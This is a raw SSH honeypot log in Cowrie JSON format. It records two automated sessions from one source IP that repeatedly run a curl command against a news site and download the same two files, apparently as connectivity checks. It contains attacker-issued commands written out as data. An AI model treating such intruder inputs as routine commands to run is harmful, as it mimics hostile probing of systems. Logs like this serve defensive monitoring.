{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.256966Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.276338Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.284416Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.285799Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.289045Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.290012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.307004Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.323398Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.324432Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.328472Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.329555Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.361049Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.362506Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.367424Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.368447Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.372901Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.399036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.400447Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.405133Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.406281Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.429941Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.440252Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.441431Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.445696Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.446364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.477479Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.478510Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.483706Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.484729Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.504931Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.514238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.515352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.521067Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.522176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.550016Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.551181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.560930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.562094Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.585768Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.586942Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.601639Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.602728Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.612846Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.625354Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.626371Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.641673Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.642639Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.660646Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.661602Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.681370Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.682393Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.696921Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.697869Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.721585Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.722784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.725514Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.732695Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.733520Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.759475Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.760377Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.762833Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.768641Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.769364Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.772127Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.783986Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.789033Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.791434Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.796790Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.797625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.808205Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.809065Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.835815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.836704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.842895Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.843742Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.873482Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.874485Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.877747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.878652Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.893939Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.898557Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.906220Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.908134Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.910760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.911684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.913225Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.913980Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.916395Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.933303Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.947744Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.948843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.952315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.953326Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.981147Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.987965Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:44.988960Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:44.991264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
